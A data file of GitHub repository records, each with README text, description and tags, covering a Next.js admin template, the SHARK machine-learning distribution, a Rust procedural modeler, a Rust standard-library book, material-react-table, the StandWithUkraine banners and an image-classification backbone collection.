appropriate. If you use content provided by another party, it must be appropriately licensed using an open source license. Contributions are only accepted through Github pull requests. Finally, contributed code must work in all supported browsers (see above for browser support). Changelog 📆 Please refer to the CHANGELOG file. We will add a detailed release notes to each new release. Support 🧑🏻‍💻 For free products, enjoy community support via GitHub issues. Upgrade to Premium for dedicated support from our expert team. License © Copyright © ThemeSelection Licensed under MIT All our free items are Open Source and licensed under MIT. You can use our free items for personal as well as commercial purposes. We just need an attribution from your end. Copy the below link and paste it at the footer of your web application or project. html <a href="https://themeselection.com/">ThemeSelection</a> Also Available In Looking For Premium Admin Templates ?? 👀 ThemeSelection provides Selected high quality, modern design, professional and easy-to-use Fully Coded Dashboard Templates & UI Kits to create your applications faster! Bootstrap Admin Templates VueJS Admin Templates Laravel Admin Templates Django Admin Templates React (NextJS) Admin Templates ASP.Net Core Admin Templates Free UI Kits If you want to Download Free Admin Templates like Materio then do visit ThemeSelection . Useful Links 🎁 Vue CheatSheet Freebies Download Free Admin Templates Bootstrap 5 CheatSheet Social Media :earth_africa: Twitter Facebook Pinterest Instagram Discord YouTube;An enterprise-grade Next.js admin dashboard template. Made with developer experience first: Next.js v14 (App Router), Material UI (MUI), Tailwind CSS, TypeScript, ESLint, Prettier, VSCode Configs !! 🚀;admin-dashboard,admin-template,freebies,admin-dashboard-template,dashboard-template,nextjs-admin,boilerplate,free-admin-dashboard,free-admin-template,javascript
themeselection/materio-mui-nextjs-admin-template-free
nod-ai/SHARK;SHARK High Performance Machine Learning Distribution We are currently rebuilding SHARK to take advantage of Turbine . Until that is complete make sure you use an .exe release or a checkout of the SHARK-1.0 branch, for a working SHARK Prerequisites - Drivers #### Install your Windows hardware drivers * [AMD RDNA Users] Download the latest driver (23.2.1 is the oldest supported) [here](https://www.amd.com/en/support). * [macOS Users] Download and install the 1.3.216 Vulkan SDK from [here](https://sdk.lunarg.com/sdk/download/1.3.216.0/mac/vulkansdk-macos-1.3.216.0.dmg). Newer versions of the SDK will not work. * [Nvidia Users] Download and install the latest CUDA / Vulkan drivers from [here](https://developer.nvidia.com/cuda-downloads) #### Linux Drivers * MESA / RADV drivers wont work with FP16. Please use the latest AMGPU-PRO drivers (non-pro OSS drivers also wont work) or the latest NVidia Linux Drivers. Other users please ensure you have your latest vendor drivers and Vulkan SDK from [here](https://vulkan.lunarg.com/sdk/home) and if you are using vulkan check `vulkaninfo` works in a terminal window Quick Start for SHARK Stable Diffusion for Windows 10/11 Users Install the Driver from (Prerequisites)[https://github.com/nod-ai/SHARK#install-your-hardware-drivers] above Download the stable release or the most recent SHARK 1.0 pre-release . Double click the .exe, or run from the command line (recommended), and you should have the UI in the browser. If you have custom models put them in a models/ directory where the .exe is. Enjoy. More installation notes * We recommend that you download EXE in a new folder, whenever you download a new EXE version. If you download it in the same folder as a previous install, you must delete the old `*.vmfb` files with `rm *.vmfb`. You can also use `--clear_all` flag once to clean all the old files. * If you recently updated the driver or this binary (EXE file), we recommend you clear all the local artifacts with `--clear_all` ## Running * Open a Command Prompt or Powershell terminal, change folder (`cd`) to the .exe folder. Then run the EXE from the command prompt. That way, if an error occurs, you'll be able to cut-and-paste it to ask for help. (if it always works for you without error, you may simply double-click the EXE) * The first run may take few minutes when the models are downloaded and compiled. Your patience is appreciated. The download could be about 5GB. * You will likely see a Windows Defender message asking you to give permission to open a web server port. Accept it. * Open a browser to access the Stable Diffusion web server. By default, the port is 8080, so you can go to http://localhost:8080/. * If you prefer to always run in the browser, use the `--ui=web` command argument when running the EXE. ## Stopping * Select the command prompt that's running the EXE. Press CTRL-C and wait a moment or close the terminal. Advanced Installation (Only for developers) ## Advanced Installation (Windows, Linux and macOS) for developers ### Windows 10/11 Users * Install Git for Windows from [here](https://git-scm.com/download/win) if you don't already have it. ## Check out the code ```shell git clone https://github.com/nod-ai/SHARK.git cd SHARK ``` ## Switch to the Correct Branch (IMPORTANT!) Currently SHARK is being rebuilt for [Turbine](https://github.com/nod-ai/SHARK-Turbine) on the `main` branch. For now you are strongly discouraged from using `main` unless you are working on the rebuild effort, and should not expect the code there to produce a working application for Image Generation, So for now you'll need switch over to the `SHARK-1.0` branch and use the stable code. ```shell git checkout SHARK-1.0 ``` The following setup instructions assume you are on this branch. ## Setup your Python VirtualEnvironment and Dependencies ### Windows 10/11 Users * Install the latest Python 3.11.x version from [here](https://www.python.org/downloads/windows/) #### Allow the install script to run in Powershell ```powershell set-executionpolicy remotesigned ``` #### Setup venv and install necessary packages (torch-mlir, nodLabs/Shark, ...) ```powershell ./setup_venv.ps1 #You can re-run this script to get the latest version ``` ### Linux / macOS Users ```shell ./setup_venv.sh source shark1.venv/bin/activate ``` ### Run Stable Diffusion on your device - WebUI #### Windows 10/11 Users ```powershell (shark1.venv) PS C:\g\shark> cd .\apps\stable_diffusion\web\ (shark1.venv) PS C:\g\shark\apps\stable_diffusion\web> python .\index.py ``` #### Linux / macOS Users ```shell (shark1.venv) > cd apps/stable_diffusion/web (shark1.venv) > python index.py ``` #### Access Stable Diffusion on http://localhost:8080/?__theme=dark ### Run Stable Diffusion on your device - Commandline #### Windows 10/11 Users ```powershell (shark1.venv) PS C:\g\shark> python .\apps\stable_diffusion\scripts\main.py --app="txt2img" --precision="fp16" --prompt="tajmahal, snow, sunflowers, oil on canvas" --device="vulkan" ``` #### Linux / macOS Users ```shell python3.11 apps/stable_diffusion/scripts/main.py --app=txt2img --precision=fp16 --device=vulkan --prompt="tajmahal, oil on canvas, sunflowers, 4k, uhd" ``` You can replace `vulkan` with `cpu` to run on your CPU or with `cuda` to run on CUDA devices. If you have multiple vulkan devices you can address them with `--device=vulkan://1` etc The output on a AMD 7900XTX would look something like: ```shell Average step time: 47.19188690185547ms/it Clip Inference time (ms) = 109.531 VAE Inference time (ms): 78.590 Total image generation time: 2.5788655281066895sec ``` Here are some samples generated: Find us on SHARK Discord server if you have any trouble with running it on your hardware. Binary Installation ### Setup a new pip Virtual Environment This step sets up a new VirtualEnv for Python ```shell python --version #Check you have 3.11 on Linux, macOS or Windows Powershell python -m venv shark_venv source shark_venv/bin/activate # Use shark_venv/Scripts/activate on Windows # If you are using conda create and activate a new conda env # Some older pip installs may not be able to handle the recent PyTorch deps python -m pip install --upgrade pip ``` *macOS Metal* users please install https://sdk.lunarg.com/sdk/download/latest/mac/vulkan-sdk.dmg and enable "System wide install" ### Install SHARK This step pip installs SHARK and related packages on Linux Python 3.8, 3.10 and 3.11 and macOS / Windows Python 3.11 ```shell pip install nodai-shark -f https://nod-ai.github.io/SHARK/package-index/ -f https://llvm.github.io/torch-mlir/package-index/ -f https://nod-ai.github.io/SRT/pip-release-links.html --extra-index-url https://download.pytorch.org/whl/nightly/cpu ``` ### Run shark tank model tests. ```shell pytest tank/test_models.py ``` See tank/README.md for a more detailed walkthrough of our pytest suite and CLI. ### Download and run Resnet50 sample ```shell curl -O https://raw.githubusercontent.com/nod-ai/SHARK/main/shark/examples/shark_inference/resnet50_script.py #Install deps for test script pip install --pre torch torchvision torchaudio tqdm pillow gsutil --extra-index-url https://download.pytorch.org/whl/nightly/cpu python ./resnet50_script.py --device="cpu" #use cuda or vulkan or metal ``` ### Download and run BERT (MiniLM) sample ```shell curl -O https://raw.githubusercontent.com/nod-ai/SHARK/main/shark/examples/shark_inference/minilm_jit.py #Install deps for test script pip install transformers torch --extra-index-url https://download.pytorch.org/whl/nightly/cpu python ./minilm_jit.py --device="cpu" #use cuda or vulkan or metal ``` Development, Testing and Benchmarks If you want to use Python3.11 and with TF Import tools you can use the environment variables like: Set `USE_IREE=1` to use upstream IREE ``` # PYTHON=python3.11 VENV_DIR=0617_venv IMPORTER=1 ./setup_venv.sh ``` ### Run any of the hundreds of SHARK tank models via the test framework ```shell python -m shark.examples.shark_inference.resnet50_script --device="cpu" # Use gpu | vulkan # Or a pytest pytest tank/test_models.py -k "MiniLM" ``` ### How to use your locally built IREE / Torch-MLIR with SHARK If you are a *Torch-mlir developer or an IREE developer* and want to test local changes you can uninstall the provided packages with `pip uninstall torch-mlir` and / or `pip uninstall iree-compiler iree-runtime` and build locally with Python bindings and set your PYTHONPATH as mentioned [here](https://github.com/iree-org/iree/tree/main/docs/api_docs/python#install-iree-binaries) for IREE and [here](https://github.com/llvm/torch-mlir/blob/main/development.md#setup-python-environment-to-export-the-built-python-packages) for Torch-MLIR. How to use your locally built Torch-MLIR with SHARK: ```shell 1.) Run `./setup_venv.sh in SHARK` and activate `shark.venv` virtual env. 2.) Run `pip uninstall torch-mlir`. 3.) Go to your local Torch-MLIR directory. 4.) Activate mlir_venv virtual envirnoment. 5.) Run `pip uninstall -r requirements.txt`. 6.) Run `pip install -r requirements.txt`. 7.) Build Torch-MLIR. 8.) Activate shark.venv virtual environment from the Torch-MLIR directory. 8.) Run `export PYTHONPATH=`pwd`/build/tools/torch-mlir/python_packages/torch_mlir:`pwd`/examples` in the Torch-MLIR directory. 9.) Go to the SHARK directory. ``` Now the SHARK will use your locally build Torch-MLIR repo. ## Benchmarking Dispatches To produce benchmarks of individual dispatches, you can add `--dispatch_benchmarks=All --dispatch_benchmarks_dir= ` to your pytest command line argument. If you only want to compile specific dispatches, you can specify them with a space seperated string instead of `"All"`. E.G. `--dispatch_benchmarks="0 1 2 10"` For example, to generate and run dispatch benchmarks for MiniLM on CUDA: ``` pytest -k "MiniLM and torch and static and cuda" --benchmark_dispatches=All -s --dispatch_benchmarks_dir=./my_dispatch_benchmarks ``` The given command will populate ` / /` with an `ordered_dispatches.txt` that lists and orders the dispatches and their latencies, as well as folders for each dispatch that contain .mlir, .vmfb, and results of the benchmark for that dispatch. if you want to instead incorporate this into a python script, you can pass the `dispatch_benchmarks` and `dispatch_benchmarks_dir` commands when initializing `SharkInference`, and the benchmarks will be generated when compiled. E.G: ``` shark_module = SharkInference( mlir_model, device=args.device, mlir_dialect="tm_tensor", dispatch_benchmarks="all", dispatch_benchmarks_dir="results" ) ``` Output will include: - An ordered list ordered-dispatches.txt of all the dispatches with their runtime - Inside the specified directory, there will be a directory for each dispatch (there will be mlir files for all dispatches, but only compiled binaries and benchmark data for the specified dispatches) - An .mlir file containing the dispatch benchmark - A compiled .vmfb file containing the dispatch benchmark - An .mlir file containing just the hal executable - A compiled .vmfb file of the hal executable - A .txt file containing benchmark output See tank/README.md for further instructions on how to run model tests and benchmarks from the SHARK tank. API Reference ### Shark Inference API ``` from shark.shark_importer import SharkImporter # SharkImporter imports mlir file from the torch, tensorflow or tf-lite module. mlir_importer = SharkImporter( torch_module, (input), frontend="torch", #tf, #tf-lite ) torch_mlir, func_name = mlir_importer.import_mlir(tracing_required=True) # SharkInference accepts mlir in linalg, mhlo, and tosa dialect. from shark.shark_inference import SharkInference shark_module = SharkInference(torch_mlir, device="cpu", mlir_dialect="linalg") shark_module.compile() result = shark_module.forward((input)) ``` ### Example demonstrating running MHLO IR. ``` from shark.shark_inference import SharkInference import numpy as np mhlo_ir = r"""builtin.module { func.func @forward(%arg0: tensor<1x4xf32>, %arg1: tensor<4x1xf32>) -> tensor<4x4xf32> { %0 = chlo.broadcast_add %arg0, %arg1 : (tensor<1x4xf32>, tensor<4x1xf32>) -> tensor<4x4xf32> %1 = "mhlo.abs"(%0) : (tensor<4x4xf32>) -> tensor<4x4xf32> return %1 : tensor<4x4xf32> } }""" arg0 = np.ones((1, 4)).astype(np.float32) arg1 = np.ones((4, 1)).astype(np.float32) shark_module = SharkInference(mhlo_ir, device="cpu", mlir_dialect="mhlo") shark_module.compile() result = shark_module.forward((arg0, arg1)) ``` Examples Using the REST API Setting up SHARK for use with Blender Setting up SHARK for use with Koboldcpp Supported and Validated Models SHARK is maintained to support the latest innovations in ML Models: | TF HuggingFace Models | SHARK-CPU | SHARK-CUDA | SHARK-METAL | |---------------------|----------|----------|-------------| | BERT | :green_heart: | :green_heart: | :green_heart: | | DistilBERT | :green_heart: | :green_heart: | :green_heart: | | GPT2 | :green_heart: | :green_heart: | :green_heart: | | BLOOM | :green_heart: | :green_heart: | :green_heart: | | Stable Diffusion | :green_heart: | :green_heart: | :green_heart: | | Vision Transformer | :green_heart: | :green_heart: | :green_heart: | | ResNet50 | :green_heart: | :green_heart: | :green_heart: | For a complete list of the models supported in SHARK, please refer to tank/README.md . Communication Channels SHARK Discord server : Real time discussions with the SHARK team and other users GitHub issues : Feature requests, bugs etc Related Projects IREE Project Channels * [Upstream IREE issues](https://github.com/google/iree/issues): Feature requests, bugs, and other work tracking * [Upstream IREE Discord server](https://discord.gg/wEWh6Z9nMU): Daily development discussions with the core team and collaborators * [iree-discuss email list](https://groups.google.com/forum/#!forum/iree-discuss): Announcements, general and low-priority discussion MLIR and Torch-MLIR Project Channels * `#torch-mlir` channel on the LLVM [Discord](https://discord.gg/xS7Z362) - this is the most active communication channel * Torch-MLIR Github issues [here](https://github.com/llvm/torch-mlir/issues) * [`torch-mlir` section](https://llvm.discourse.group/c/projects-that-want-to-become-official-llvm-projects/torch-mlir/41) of LLVM Discourse * Weekly meetings on Mondays 9AM PST. See [here](https://discourse.llvm.org/t/community-meeting-developer-hour-refactoring-recurring-meetings/62575) for more information. * [MLIR topic within LLVM Discourse](https://llvm.discourse.group/c/llvm-project/mlir/31) SHARK and IREE is enabled by and heavily relies on [MLIR](https://mlir.llvm.org). License nod.ai SHARK is licensed under the terms of the Apache 2.0 License with LLVM Exceptions. See LICENSE for more information.;SHARK - High Performance Machine Learning Distribution;deep-learning,machine-learning,mlir,pytorch,amd,apple-silicon,nvidia
nod-ai/SHARK
setzer22/blackjack;Your Rusty 🦀 procedural 3d modeler ARCHIVED REPOSITORY This repository is now archived because of a variety of technical and political reasons that made me loose my motivation to continue contributing to the Rust community in my free time. Blackjack is a procedural modelling application, following the steps of great tools like Houdini or Blender's geometry nodes project . At its core, Blackjack is a simple node-driven interface where you can compose operations to create a 3d mesh in a non-destructive way. Features and goals Blackjack does not aim to replace an industry powerhouse such as Houdini . Instead, it aims to provide a less cluttered, more robust and user-friendly experience for a small subset of the features that make these tools a great fit in the world of game development and real-time simulations. Here are the main goals and philosophy behind blackjack, but note that this shows the direction where things are going, not their current state. Procedural polygonal modelling, first and foremost : The main focus in Blackjack is the creation of low-poly procedural assets like the ones one would see in videogames. In particular, surface extraction of volumetric data is not among its goals. Flexible node-based interface: Build complex node graphs, create reusable functions, and tweak every parameter in real-time! Integration with popular game engines: Export your procedural assets as tiny programs and tweak their parameters at runtime by adding a simple library to your engine of choice. Error resilience, crash resistance: When things go wrong, Blackjack will make an effort to respect your time as a user and not lose your work. Errors will be clearly communicated and fixing any bugs leading to a crash will take the highest priority. Install and usage Note : A crates.io version cannot be published due to unreleased dependencies. Blackjack depends on the bleeding edge version of some crates and requires custom forks for some others. This situation may change once development stabilizes. Here are the steps in order to try out the early development version of Blackjack. Binaries and easier installation methods will be provided in the future. The steps below require a complete Rust toolchain using cargo , with a minimum supported Rust version (MSRV) of 1.62.0 . Clone this repository, and make sure to download LFS files. In some systems, this may require separately installing a git-lfs [^1] package: bash git clone https://github.com/setzer22/blackjack git lfs install git lfs fetch --all git lfs pull [^1]: Linux users can install git-lfs with their distro's package manager ( apt install git-lfs / yum install git-lfs / pacman -S git-lfs ). MacOS users using homebrew can use brew install git-lfs . Other users should follow the git-lfs install instructions . Install build dependencies. This may not cover everything, please file an issue or a pull request if you find anything missing: Ubuntu/Debian: sudo apt install libfontconfig-dev Arch Linux: sudo pacman -S fontconfig Fedora: sudo dnf install fontconfig-devel Note : The fontconfig native dependency is temporary, and will no longer be necessary once this upstream issue is fixed: https://github.com/rust-windowing/winit/issues/2373 From the same folder, run cargo run --release --bin blackjack_ui to launch Blackjack. Usage Some minimal usage instructions. Please do note that these can and will change frequently during early development: The bottom section of the screen is the node graph. Use right click to open the node selector. Find a node and spawn it by clicking on it. You can also use the search bar. Nodes can be dragged around, and its widgets interacted with using the mouse. Dragging the mouse between two nodes' ports will create a connection. Use the 'Set active' button under a node to make it render to the screen. Tech stack Blackjack is built using Rust 🦀 and stands on the shoulders of giants. Here's a shout out to some great rust crates being used in this project: rend3 is used for all rendering purposes. egui is used as the UI toolkit powering all 2d interaction. wgpu , as the base of rend3 , is used for all custom visual effects. mlua is used to integrate Luau as an extension language. Tool Maturity Blackjack is still under active development. Many features are missing and are bound to change. For now, no promises are made with regards to stability , but API breakage will be considered only when absolutely necessary. Contributing Contributions are welcome! Before writing a PR, please get in touch by filing an issue 😄;A procedural, node-based modelling tool, made in rust 🦀;[]
setzer22/blackjack
Warrenren/inside-rust-std-library;inside-rust-std-library 实体书已经出版,名字为《深入rust标准库》,正在预售,可在京东搜索到。欢迎大家采购实体书籍,给作者一些支持。 本书主要对RUST的标准库代码进行分析。 本书尽可能给读者找出一条标准库代码的阅读脉络。同时,分析不仅仅针对代码的功能,也针对代码背后的需求及若干代码设计的思路。 C语言精通的标志是对指针的精通。RUST的裸指针也是RUST的最基础及最核心的难点之一。 所以,将裸指针及相关的内存模块作为代码分析的起始点,熟悉了裸指针及内存,自然也就对所有权,借用,生命周期的本质有了深刻的理解,RUST语言的最难关便过了。 泛型是RUST不可分割的语法之一,而对于其他语言,没有泛型不影响语言的使用。泛型及基于trait的泛型约束是RUST的另一个代码基础。 针对基本类型的分析,可以看到RUST利用trait语法使之具备了无限的扩展性,这是RUST更有表现力的语法能力的展现。 Option /Result 等类型实际完全是由标准库定义的,并不是RUST语言最底层的基本内容,可以从代码分析中发现这一点。 所有的运算符都可以重载,且可以跨越类型重载,RUST的运算符重载揭示了RUST很多的编码奥秘及技巧。 Iterator加闭包是函数式编程的基础构架,Iterator的适配器构成了函数式编程的基础设施,RUST完整的实现了这些内容,并且几乎为每个类型都实现了迭代器,并尽可能的为函数式编程做好了准备。 Cell /RefCell /Pin /Lazy 代码证明了在RUST的基础语法下,如何创造性的解决问题。 Box /RawVec 是两个堆内存申请的基本结构,善用这两个结构,除非写内存管理,基本上就不必再接触底层的堆内存申请及释放。 每一个智能指针实际上也是RUST对经典的数据结构实现的精妙例程。 RUST对不同操作系统的适配让程序员不必象C那样再重复的耗费精力并且还沾沾自喜于此份工作。 仅支持异步编程的async/await,Future也体现了RUST的作最基础的工作的态度。 ... ... (This book focuses on the analysis of RUST's standard library code. This book is as far as possible to find a reading context for the standard library code. At the same time, the analysis is not only for the function of the code, but also for the requirements behind the code and some ideas of code design. The hallmark of C proficiency is mastery of pointer. The raw pointer in RUST is also one of the most basic and core difficulties of RUST. Therefor, the raw pointer and associated memory modules are used as the starting point for code analysis, and the familiarity with raw pointer and memory naturally leads to a profound understanding of the nature of ownership, borrowing, and the life cycle. The hardest part of RUST is over. Generics are an integral part of RUST's syntax, and for other languages, the absence of generics does not affect language use. Generics and their trait - based generic constraints are another code base of RUST. Based on the analysis of primitive types, it can be seen that RUST makes use of trait syntax to make primitive types infinitely extensible, which is a demonstration of RUST's more expressive syntax ability. Types such as Option /Result are actually defined entirely by the standard library and are not the basic content of the lowest level of the RUST language, as you can see from code analysis. All operators can be overloaded and can cross type overloading. Operator overloading in RUST reveals many of RUST's coding secrets and tricks. Iterator plus closures are the foundation of functional programming. The adapters of Iterator make up the infrastructure of functional programming. RUST implements them completely, implementing iterators for almost every type and preparing them as well as possible for functional programming. The Cell/RefCell/Pin/Lazy source code demonstrates how creative problem solving can be done within RUST's basic syntax. Box/RawVec are the two basic structures of heap memory allocation and freeing. Each smart pointer is actually an elegant routine of RUST's implementation of classical data structures. RUST's adaptation of different operating systems saves programmers from the repetitive effort and complacency of C. Supporting only async/await for asynchronous programming, Future also embodies RUST's attitude of doing the most basic work. ... ... );本书已经正式出版,目前正预售,可在京东搜索《深入RUST标准库》即可。本书主要对RUST的标准库代码进行分析,并试图给出RUST标准库代码的分析脉络。This project try to give a venation of how reading the RUST standard library source code. ;[]
Warrenren/inside-rust-std-library
KevinVandy/material-react-table;Material React Table V2 View Documentation <a href="https://github.com/sponsors/kevinvandy" target="_blank" rel="noopener" <a href="https://discord.gg/5wqyRx6fnm" target="_blank" rel="noopener" About Quickly Create React Data Tables with Material Design Built with Material UI V5 and TanStack Table V8 Want to use Mantine instead of Material UI? Check out Mantine React Table Learn More Join the Discord server to join in on the development discussion or ask questions View the Docs Website See all Props, Options, APIs, Components, and Hooks Quick Examples Basic Table (See Default Features) Minimal Table (Turn off Features like Pagination, Sorting, Filtering, and Toolbars) Advanced Table (See some of the Advanced Features) Custom Headless Table (Build your own table markup) Dragging / Ordering Examples (Drag and Drop) Editing (CRUD) Examples (Create, Edit, and Delete Rows) Expanding / Grouping Examples (Sum, Average, Count, etc.) Filtering Examples (Faceted Values, Switching Filters, etc.) Sticky Pinning Examples (Sticky Headers, Sticky Columns, Sticky Rows, etc.) Remote Data Fetching Examples (Server-side Pagination, Sorting, and Filtering) Virtualized Examples (10,000 rows at once!) Infinite Scrolling (Fetch data as you scroll) Localization (i18n) (Over a dozen languages built-in) View additional storybook examples Features All features can easily be enabled/disabled Fully Fleshed out Docs are available for all features [x] 30-56kb gzipped - Bundlephobia [x] Advanced TypeScript Generics Support (TypeScript Optional) [x] Aggregation and Grouping (Sum, Average, Count, etc.) [x] Cell Actions (Right-click Context Menu) [x] Click To Copy Cell Values [x] Column Action Dropdown Menu [x] Column Hiding [x] Column Ordering via Drag'n'Drop [x] Column Pinning (Freeze Columns) [x] Column Resizing [x] Customize Icons [x] Customize Styling of internal Mui Components [x] Data Editing and Creating (5 different editing modes) [x] Density Toggle [x] Detail Panels (Expansion) [x] Faceted Value Generation for Filter Options [x] Filtering (supports client-side and server-side) [x] Filter Match Highlighting [x] Full Screen Mode [x] Global Filtering (Search across all columns, rank by best match) [x] Header Groups & Footers [x] Localization (i18n) support [x] Manage your own state or let the table manage it internally for you [x] Pagination (supports client-side and server-side) [x] Row Actions (Your Custom Action Buttons) [x] Row Numbers [x] Row Ordering via Drag'n'Drop [x] Row Pinning [x] Row Selection (Checkboxes) [x] SSR compatible [x] Sorting (supports client-side and server-side) [x] Theming (Respects your Material UI Theme) [x] Toolbars (Add your own action buttons) [x] Tree Data / Expanding Sub-rows [x] Virtualization (@tanstack/react-virtual) Getting Started Installation View the full Installation Docs Ensure that you have React 18 or later installed Install Peer Dependencies (Material UI V5) bash npm install @mui/material @mui/x-date-pickers @mui/icons-material @emotion/react @emotion/styled Install material-react-table bash npm install material-react-table @tanstack/react-table , @tanstack/react-virtual , and @tanstack/match-sorter-utils are internal dependencies, so you do NOT need to install them yourself. Usage Read the full usage docs here ```jsx import { useMemo, useState, useEffect } from 'react'; import { MaterialReactTable, useMaterialReactTable, } from 'material-react-table'; //data must be stable reference (useState, useMemo, useQuery, defined outside of component, etc.) const data = [ { name: 'John', age: 30, }, { name: 'Sara', age: 25, }, ]; export default function App() { const columns = useMemo( () => [ { accessorKey: 'name', //simple recommended way to define a column header: 'Name', muiTableHeadCellProps: { sx: { color: 'green' } }, //optional custom props Cell: ({ cell }) => {cell.getValue()} , //optional custom cell render }, { accessorFn: (row) => row.age, //alternate way id: 'age', //id required if you use accessorFn instead of accessorKey header: 'Age', Header: () => Age , //optional custom header render }, ], [], ); //optionally, you can manage any/all of the table state yourself const [rowSelection, setRowSelection] = useState({}); useEffect(() => { //do something when the row selection changes }, [rowSelection]); const table = useMaterialReactTable({ columns, data, enableColumnOrdering: true, //enable some features enableRowSelection: true, enablePagination: false, //disable a default feature onRowSelectionChange: setRowSelection, //hoist internal state to your own state (optional) state: { rowSelection }, //manage your own state, pass it back to the table (optional) }); const someEventHandler = () => { //read the table state during an event from the table instance console.log(table.getState().sorting); }; return ( //other more lightweight MRT sub components also available ); } ``` Open in Code Sandbox Contributors PRs are Welcome, but please discuss in GitHub Discussions or the Discord Server first if it is a large change! Read the Contributing Guide to learn how to run this project locally.;A fully featured Material UI V5 implementation of TanStack React Table V8, written from the ground up in TypeScript;react,typescript,react-table,material-table,material-ui,data-table,tanstack,datagrid
KevinVandy/material-react-table
vshymanskyy/StandWithUkraine;This repository contains Readme Banners (and some useful docs) that can be used by OSS projects to spread the word, support and help Ukraine in this disastrous situation. Like this (click to open) : 📢 Updates from Ukrainian Open Source Community 🇷🇺 Обращение к гражданам России For Maintainers and Authors Spread the word. Add one of the banners to your README.md . Badges are also available Get rid of Russian software and dependencies Deliver a message to your users (esp. those in Russia) along with your next release. See example here Follow the cyber safety guide Projects that #StandWithUkraine AssemblyScript - A variant of TypeScript that compiles to WebAssembly using Binaryen Awesome - Awesome lists about all kinds of interesting topics MacPaw - A company behind prominent Mac software: CleanMyMac X, Setapp, Gemini 2, The Unarchiver AVA.js - A test runner for Node.js that lets you develop with confidence Wasm3 - WebAssembly engine Rete.js - JavaScript framework for visual programming Blynk - IoT platform pnpm - Fast, disk space efficient package manager PlatformIO - A professional collaborative platform for embedded development TinyGSM - A small Arduino library for GSM modules, that just works wasm2native - Turn WASI apps into native executables node-wasm-run - Run arbitrary WASM/WASI files embedded-wasm-apps - Statically-compiled WebAssembly apps on any embedded platform php-vast - VAST Ad generator and parser library on PHP miband-js - A clean implementation of Mi Band 2 library for Browsers and Node.js, using WebBluetooth API mailamie - A simple SMTP catch all server for testing written in PHP ReStable - jQuery plugin that makes tables responsive converting them to HTML lists phpbench - PHPBench is a benchmark runner for PHP analogous to PHPUnit but for performance rather than correctness Codeception - Codeception is a modern full-stack testing framework for PHP. Inspired by BDD PHPUnit - PHPUnit is the most commonly used testing framework for PHP Payum - Payum is a PHP Payment processing library. It offers everything you need to work with payments Soketi - soketi is your simple, fast, and resilient open-source WebSockets server PHPMailer - The classic email sending library for PHP Awesome Crystal - A collection of awesome Crystal libraries, tools, frameworks and software bcrypt.net - Porting of bcrypt.codeplex.com with enhanced security, missing fixes, features and better .net support lvgl-rs - Open-source Embedded GUI Library in Rust iban-validation - A small library for validating International BankAccount Numbers (IBANs) portable-ascii - Portable ASCII library - performance optimized (ascii) string functions for PHP comfey - Comfey is a tiny data binding library inspired by React hook useState terraform-aws-modules - Collection of Terraform AWS modules supported by the community USDCUP.io - Web App that finds and tracks the average price of USD vs CUP in the informal (street) market in Cuba CherryPy - A Minimalist Python Web Framework Cheroot - A high-performance, pure-Python HTTP server used by CherryPy octomachinery - Invisible engine driving octobot machines. Simple, yet powerful. A pythonic framework for making GitHub Apps-powered bots Better Go Playground - Go playground alternative with syntax highlight, code autocomplete and WebAssembly support Canvacord - Simple & easy to use image manipulation module for beginners spaceship-prompt — Minimalistic, powerful and extremely customizable Zsh prompt wtfjs — A list of funny and tricky JavaScript examples bash-handbook — A handbook for those who want to learn Bash vacuum-card — Vacuum cleaner card for Home Assistant Lovelace UI purifier-card — Air Purifier card for Home Assistant Lovelace UI Moped - A general purpose text editor, small and light fluent-vue - Internationalization plugin for Vue.js Kap - An open-source screen recorder built with web technology bootScore - A powerful, free Bootstrap 5 starter theme for WordPress UAdata - Ukrainian data hub with API MahApps.Metro - A toolkit for creating modern WPF applications. Lots of goodness out-of-the box MahApps.Metro.IconPacks - Awesome icon packs for WPF and UWP in one library GongSolutions.WPF.DragDrop - An easy to use drag'n'drop framework for WPF ElectricsEagles - ElectricsEagles drones PokeTube - An Youtube player thats focused on privacy ProxyManager - A PHP library that aims to provide abstraction for generating various kinds of proxy classes FAR.js - Cross-platform File and ARchive Manager in your terminal Stacks.js - Develop modern clouds, apps & framework-agnostic libraries, faster django-content-settings - The most advanced admin editable setting for Django ...and more than 23000 others;#StandWithUkraine banner and related documents;ukraine,standwithukraine,stoprussionagression,stopputinnow,russia,belarus
vshymanskyy/StandWithUkraine
Fafa-DL/Awesome-Backbones;Awesome backbones for image classification [![BILIBILI](https://raw.githubusercontent.com/Fafa-DL/readme-data/main/Bilibili.png)](https://space.bilibili.com/46880349) ![](https://img.shields.io/badge/Awesome%20Backbones-v0.6.3-brightgreen) ![](https://img.shields.io/badge/PyTorch-%3E%3Dv1.7.1-green) ![](https://img.shields.io/badge/Python-%3E%3Dv3.6-yellowgreen) [![GitHub forks](https://img.shields.io/github/forks/Fafa-DL/Awesome-Backbones)](https://github.com/Fafa-DL/Awesome-Backbones) [![GitHub stars](https://img.shields.io/github/stars/Fafa-DL/Awesome-Backbones)](https://github.com/Fafa-DL/Awesome-Backbones) 写在前面 若训练效果不佳,首先需要调整学习率和Batch size,这俩超参很大程度上影响收敛。其次,从关闭图像增强手段(尤其小数据集)开始,有的图像增强方法会污染数据,如 如何去除增强?如 efficientnetv2-b0 配置文件中train_pipeline可更改为如下 yaml train_pipeline = [ dict(type='LoadImageFromFile'), dict( type='RandomResizedCrop', size=192, efficientnet_style=True, interpolation='bicubic'), dict(type='Normalize', **img_norm_cfg), dict(type='ImageToTensor', keys=['img']), dict(type='ToTensor', keys=['gt_label']), dict(type='Collect', keys=['img', 'gt_label']) ] 若你的数据集提前已经将shape更改为网络要求的尺寸,那么 Resize 操作也可以去除。 更新日志 2023.12.02 - 新增Issue中多人提及的输出 Train Acc 与 Val loss - metrics_outputs.csv 保存每周期 train_loss, train_acc, train_precision, train_recall, train_f1-score, val_loss, val_acc, val_precision, val_recall, val_f1-score 方便各位绘图 - 终端由原先仅输出 Val 相关metrics升级为Train与Val都输出 ![](https://raw.githubusercontent.com/Fafa-DL/readme-data/main/backbones/terminal.jpg) 2023.08.05 - 新增 TinyViT (预训练权重不匹配)、 DeiT3 、 EdgeNeXt 、 RevVisionTransformer 2023.03.07 - 新增 MobileViT 、 DaViT 、 RepLKNet 、 BEiT 、 EVA 、 MixMIM 、 EfficientNetV2 2022.11.20 - 新增是否将测试集用作验证集选项,若不使用,从训练集按ratio划分验证集数量,随机从训练集某fold挑选作为验证集(类似k-fold但不是,可自己稍改达到k-fold目的),详见 Training tutorial 2022.11.06 - 新增 HorNet , EfficientFormer , SwinTransformer V2 , MViT 模型 测试环境 Pytorch 1.7.1+ Python 3.6+ 资料 